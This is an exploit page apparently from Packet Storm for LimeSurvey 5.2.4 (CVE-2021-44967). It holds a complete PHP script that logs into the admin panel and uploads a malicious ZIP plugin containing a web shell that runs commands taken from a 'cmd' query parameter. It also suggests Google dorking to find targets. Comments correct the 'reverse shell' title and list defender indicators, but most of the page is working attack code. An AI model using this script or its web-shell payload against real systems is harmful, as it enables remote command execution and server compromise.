## https://sploitus.com/exploit?id=PACKETSTORM:214834
=============================================================================================================================================
    | # Title     : LimeSurvey 5.2.4 reverse shell Vulnerability                                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.limesurvey.org/                                                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engines.
    
    [+] Code Description: This script is used to exploit a vulnerability in LimeSurvey to load a malicious PHP plugin and execute a reverse shell.
    
       (Related : https://packetstorm.news/files/id/189288/ Related CVE numbers: 	CVE-2021-44967 ) .
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 112 of poc.php (the $url variable)
    
    [+] Usage : php poc.php
    
    [+] PayLoad :
    
    <?php
    
    /**
     * Exploit script for CVE-2021-44967 in LimeSurvey: log in to the admin
     * interface, then upload a ZIP "plugin" containing a PHP file. Despite the
     * title, the payload (see $payload) is a GET-parameter web shell rather
     * than a reverse shell.
     *
     * Defender note: the chain aborts without valid admin credentials
     * (limesurvey_authenticate() calls exit() on a failed login), so credential
     * hygiene and monitoring of admin plugin uploads are the relevant controls.
     */
    
    // Stream context that disables TLS certificate and hostname verification.
    // It is read through $GLOBALS['context'] in limesurvey_authenticate() for
    // the initial GET of the login page only; the POST contexts built later
    // do not carry these ssl options.
    $context = stream_context_create([
        'ssl' => [
            'verify_peer' => false,
            'verify_peer_name' => false,
        ]
    ]);
    
    // Plugin metadata for config.xml. The name gets a random 4-digit suffix
    // and both dates are today's; a plugin named "ExploitRCE_<nnnn>" is a
    // clear indicator in plugin listings or upload logs.
    $plugin_name = "ExploitRCE_" . rand(1000, 9999);
    $date = date("Y-m-d");
    $xml_config = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
    $xml_config .= "<config>\n";
    $xml_config .= "    <metadata>\n";
    $xml_config .= "        <name>$plugin_name</name>\n";
    $xml_config .= "        <type>plugin</type>\n";
    $xml_config .= "        <creationDate>$date</creationDate>\n";
    $xml_config .= "        <lastUpdate>$date</lastUpdate>\n";
    $xml_config .= "        <version>1.0</version>\n";
    $xml_config .= "    </metadata>\n";
    // Compatibility range claimed by the manifest (3.0 through 7.0).
    $xml_config .= "    <compatibility>\n";
    $xml_config .= "        <version>3.0</version>\n";
    $xml_config .= "        <version>4.0</version>\n";
    $xml_config .= "        <version>5.0</version>\n";
    $xml_config .= "        <version>6.0</version>\n";
    $xml_config .= "        <version>7.0</version>\n";
    $xml_config .= "    </compatibility>\n";
    $xml_config .= "</config>";
    
    // Log in to the LimeSurvey admin interface using the Authdb method.
    //
    // @param string $url      base URL of the target, without a trailing slash
    // @param string $username admin user name
    // @param string $password admin password
    // @return void  Prints progress to stdout; calls exit() when the response
    //               does not contain '/index.php/admin/index'.
    function limesurvey_authenticate($url, $username, $password) {
        echo "[*] محاولة تسجيل الدخول...\n"; // "Attempting to log in..."
        $login_url = "$url/index.php/admin/authentication/sa/login";
        // Fetch the login form (with the global no-verify SSL context) and
        // scrape the YII_CSRF_TOKEN hidden field from it.
        $login_page = file_get_contents($login_url, false, $GLOBALS['context']);
        preg_match('/name=\"YII_CSRF_TOKEN\" value=\"(.*?)\"/', $login_page, $matches);
        $csrf_token = $matches[1] ?? ''; // empty when no token was found
        
        $data = http_build_query([
            "YII_CSRF_TOKEN" => $csrf_token,
            "authMethod" => "Authdb",
            "user" => $username,
            "password" => $password,
            "login_submit" => "login"
        ]);
    
        // Form-encoded POST to the same URL; this context has no ssl options.
        $options = [
            "http" => [
                "method" => "POST",
                "header" => "Content-type: application/x-www-form-urlencoded",
                "content" => $data,
            ]
        ];
        
        $result = file_get_contents($login_url, false, stream_context_create($options));
        
        // Success is inferred from the admin index path appearing in the body;
        // on failure the whole script stops here.
        if (strpos($result, '/index.php/admin/index') !== false) {
            echo "[+] تسجيل الدخول ناجح!\n"; // "Login successful!"
        } else {
            echo "[-] فشل تسجيل الدخول\n"; // "Login failed"
            exit();
        }
    }
    
    // Upload the ZIP through the plugin manager's upload action as a
    // hand-built multipart/form-data POST.
    //
    // @param string $url         base URL of the target
    // @param string $plugin_name file-name stem for the uploaded ZIP
    // @param string $payload     raw ZIP bytes (built at top level as $payload_data)
    // @return void  Prints progress to stdout; calls exit() when the response
    //               does not contain 'sa=uploadConfirm'.
    //
    // Defender note: an admin POST to pluginmanager?sa=upload carrying a ZIP
    // attachment is the observable event for this technique.
    function upload_payload($url, $plugin_name, $payload) {
        echo "[*] رفع الحمولة الخبيثة...\n"; // "Uploading the malicious payload..."
        $upload_url = "$url/index.php/admin/pluginmanager?sa=upload";
        
        // Single file part named "the_file"; the boundary is md5 of the
        // current Unix time, so it is predictable to the second.
        $boundary = "----WebKitFormBoundary" . md5(time());
        $data = "--$boundary\r\n";
        $data .= "Content-Disposition: form-data; name=\"the_file\"; filename=\"$plugin_name.zip\"\r\n";
        $data .= "Content-Type: application/zip\r\n\r\n";
        $data .= $payload . "\r\n";
        $data .= "--$boundary--\r\n";
        
        // Fresh context: only the multipart Content-Type header is set here.
        $options = [
            "http" => [
                "method" => "POST",
                "header" => "Content-Type: multipart/form-data; boundary=$boundary",
                "content" => $data,
            ]
        ];
        
        $result = file_get_contents($upload_url, false, stream_context_create($options));
        
        // Success is inferred from 'sa=uploadConfirm' appearing in the body.
        if (strpos($result, 'sa=uploadConfirm') !== false) {
            echo "[+] رفع الحمولة ناجح!\n"; // "Payload upload successful!"
        } else {
            echo "[-] فشل في رفع الحمولة\n"; // "Failed to upload the payload"
            exit();
        }
    }
    
    // Build the plugin ZIP: the config.xml manifest from above plus a one-line
    // PHP web shell that passes the 'cmd' query parameter to system(). This is
    // a web shell, not the reverse shell named in the title.
    $payload = "<?php system(\$_GET['cmd']); ?>";
    $zip = new ZipArchive();
    // tempnam() creates a file in the system temp dir; ".zip" is appended to
    // that path, so the original tempnam() file is never removed by the
    // unlink() below and remains as an artifact on the operator host.
    $zip_file = tempnam(sys_get_temp_dir(), "exploit") . ".zip";
    $zip->open($zip_file, ZipArchive::CREATE);
    $zip->addFromString("config.xml", $xml_config);
    $zip->addFromString("payload.php", $payload);
    $zip->close();
    $payload_data = file_get_contents($zip_file); // raw ZIP bytes sent in the upload
    unlink($zip_file);
    
    // Target and credentials (the "line 112" the header says to edit).
    $url = "http://target-limesurvey.com"; // replace with the target address
    $username = "admin";
    $password = "password";
    
    // Run the chain: login first (exit() on failure), then the upload.
    limesurvey_authenticate($url, $username, $password);
    upload_payload($url, $plugin_name, $payload_data);
    
    // Printed whenever neither step called exit(); nothing here verifies that
    // the uploaded file is actually reachable or runs.
    echo "[*] تم تنفيذ الاستغلال بنجاح!\n"; // "Exploit executed successfully!"
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================